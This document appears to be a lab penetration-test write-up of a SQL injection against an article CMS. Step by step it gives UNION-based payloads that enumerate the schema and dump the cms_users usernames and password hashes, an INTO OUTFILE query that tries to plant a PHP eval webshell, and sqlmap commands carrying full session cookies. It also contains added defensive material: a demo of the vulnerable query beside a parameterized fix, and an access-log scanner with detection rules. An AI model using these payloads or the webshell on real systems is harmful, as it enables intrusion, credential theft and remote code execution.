SQL Injection Penetration Test of an Article Management System (CMS)

Published: 2025-07-20 ⋅ Reads: 13 ⋅ Likes: 0


Determining the injection type:

String-based injection is ruled out.

The injection type is confirmed to be numeric (integer-based).

Determining the number of columns in the underlying table:

http://192.168.1.99:8085/show.php?id=32 order by 15

An error appears at order by 16:

So the current table has 15 columns.

Determining which columns are echoed to the page:

http://192.168.1.99:8085/show.php?id=32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Nothing is echoed; change the leading id to one that does not exist:

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,1

The echo positions are 3 and 11.

Retrieving the current database and table information:

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.columns where table_name='cms_users'

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,username,4,5,6,7,8,9,10,password,12,13,14,15 from cms_users

Or:

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,group_concat(userid,':',username,':',password),4,5,6,7,8,9,10,database(),12,13,14,15 from cms_users

This yields the user ID, the username and the MD5 hash of the password; the corresponding password is 123456.
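The whole sequence above works for one reason: show.php splices the id parameter straight into the SQL text, so "order by 16" and "-32 union select ..." are executed as SQL. The following is an added example, not code from the original post or from the CMS. It rebuilds the pattern in Python on an in-memory SQLite database (a stand-in for the MySQL backend; the three-column articles table and the cms_users rows are constructed demo data, not the CMS's schema) so the vulnerable query can be run beside its hardened form.

```python
import hashlib
import sqlite3

# Constructed demo data, not the CMS's real schema: a three-column articles table
# stands in for the 15-column table from the walkthrough, and cms_users keeps the
# userid/username/password layout the post dumped. The stored password is the MD5
# of 123456, as the post reports.
PASSWORD_MD5 = hashlib.md5(b"123456").hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    conn.execute("INSERT INTO articles VALUES (32, 'Welcome', 'First article')")
    conn.execute("CREATE TABLE cms_users (userid INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO cms_users VALUES (1, 'admin', ?)", (PASSWORD_MD5,))
    conn.commit()
    return conn


def show_article_vulnerable(conn, raw_id: str):
    """Mirrors show.php?id=...: the query-string value is spliced into the SQL text.

    Anything after the number ("order by 16", "union select ...") is parsed as SQL,
    which is exactly what lets the column-count probe and the UNION dump work.
    """
    sql = f"SELECT id, title, body FROM articles WHERE id={raw_id}"
    return conn.execute(sql).fetchall()


def order_by_probe_succeeds(conn, n: int) -> bool:
    """True if 'id=32 order by n' runs without error on the vulnerable query.

    The first n that fails reveals the column count (16 fails for 15 columns in the
    post; here 4 fails for 3 columns) because the database reports a range error
    that the page surfaces to the client.
    """
    try:
        show_article_vulnerable(conn, f"32 order by {n}")
        return True
    except sqlite3.OperationalError:
        return False


def show_article_hardened(conn, raw_id: str):
    """The fix: validate the type, then bind the value as a parameter.

    int() rejects every payload shown in the post before any SQL is built, and the
    placeholder makes the driver send the value as data, never as query text.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "-32 union select userid,username,password from cms_users"
    print("vulnerable:", show_article_vulnerable(db, payload))
    print("column probe 3/4:", order_by_probe_succeeds(db, 3), order_by_probe_succeeds(db, 4))
    try:
        show_article_hardened(db, payload)
    except ValueError as exc:
        print("hardened:", exc)
```

Two things are worth noticing when running it. The UNION dump returns the admin row from cms_users through the article query, which is what the echo positions 3 and 11 are used for above; and the hardened variant never reaches the database for that input, so there is no error message to leak the column count either. The same fix in the PHP original is an integer cast (or a failed validation that stops the request) followed by a prepared statement with a bound parameter.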

Collecting back-end system information:

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,@@version_compile_os,4,5,6,7,8,9,10,database(),12,13,14,15

Entering the admin back end:

While testing "File management", the absolute path flashed past in an error message; capturing the traffic with a proxy recovered it:

X:\phpstudy_pro\WWW\cms\admin\

Construct a SQL statement to write a shell:

http://192.168.1.99:8085/show.php?id=-32 union select 1,2,"<?php @eval($_POST['c'])?>",4,5,6,7,8,9,10,database(),12,13,14,15 into outfile "X:\phpstudy_pro\WWW\cms\cmsSHELL.php"

Because the site was deliberately set up to use an ordinary cms database user, there was no permission to write the webshell.

sqlmap injection demonstration:

Capture the request to obtain the Cookie:

Invoke sqlmap:

sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D"

sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dbs

sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --tables -D "cms"

sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --columns -D "cms" -T "cms_users"

sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dump -D "cms" -T "cms_users" -C "userid,username,password"
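Every request in this walkthrough, manual or from sqlmap, lands in the web server's access log, and the sequence is distinctive: a run of "order by N" probes ending in an error, then UNION queries carrying database()/version(), then information_schema lookups, then an "into outfile" write. The following is an added example, not part of the original post and not part of any tool it uses: a Python scanner that decodes combined-format access log lines and flags these stages per client address. The log lines are constructed for the example and assume the Apache/nginx combined format; the sqlmap line assumes the tool's default User-Agent, which names itself, and uses a placeholder version and a placeholder in place of the PHP payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (Apache/nginx combined format), not taken from the original
# post. The first client walks through the probing sequence described above; the
# second is ordinary traffic. The sqlmap User-Agent is the tool's default, with a
# placeholder version; PAYLOAD_PLACEHOLDER stands in for the PHP written by the post.
SAMPLE_LOG = """\
192.168.1.50 - - [20/Jul/2025:10:00:01 +0800] "GET /show.php?id=32 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:00:05 +0800] "GET /show.php?id=32%20order%20by%2015 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:00:06 +0800] "GET /show.php?id=32%20order%20by%2016 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:00:20 +0800] "GET /show.php?id=-32%20union%20select%201,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15 HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:00:30 +0800] "GET /show.php?id=-32%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,version(),12,13,14,15%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 5400 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:01:00 +0800] "GET /show.php?id=-32%20union%20select%201,2,%22%3C?php%20PAYLOAD_PLACEHOLDER%20?%3E%22,4,5,6,7,8,9,10,database(),12,13,14,15%20into%20outfile%20%22X:%5Cphpstudy_pro%5CWWW%5Ccms%5CcmsSHELL.php%22 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
192.168.1.50 - - [20/Jul/2025:10:05:00 +0800] "GET /show.php?id=34%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
192.168.1.77 - - [20/Jul/2025:10:06:00 +0800] "GET /show.php?id=40 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One rule per stage of the walkthrough; matched against the URL-decoded request path.
RULES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("file write attempt", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("php code in parameter", re.compile(r"<\?php", re.I)),
    ("mysql fingerprinting", re.compile(r"\b(database|version|user)\(\)|@@version", re.I)),
]


def parse_line(line: str):
    """Split one combined-format line; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Payloads arrive percent-encoded; rules must see the decoded text.
    entry["decoded"] = unquote_plus(entry["path"])
    return entry


def classify(entry) -> list:
    """Names of every rule the request trips, plus a User-Agent check for sqlmap."""
    hits = [name for name, rx in RULES if rx.search(entry["decoded"])]
    if "sqlmap" in entry["ua"].lower():
        hits.append("sqlmap user-agent")
    return hits


def scan(log_text: str) -> list:
    """Return one finding per suspicious request: ip, status, hits and decoded path."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "status": entry["status"],
                             "hits": hits, "path": entry["decoded"]})
    return findings


def summarize(findings) -> dict:
    """Distinct stages seen per source address.

    One address accumulating probe -> union -> schema -> file-write in a few minutes
    is the exact progression of the walkthrough and merits an alert on its own.
    """
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["hits"])
    return by_ip


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["status"], ", ".join(f["hits"]), "->", f["path"][:70])
    for ip, stages in summarize(results).items():
        print(ip, "stages:", sorted(stages))
```

The 500 on the "order by 16" request is the server-side error that told the tester the table has 15 columns; on the defensive side the same status code next to a probe rule is the earliest signal in the sequence. The final stage fails here only because the database account lacks the privilege to write files, which is the least-privilege configuration the post itself notes; the scanner still records the attempt, since a future account change would make it succeed.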

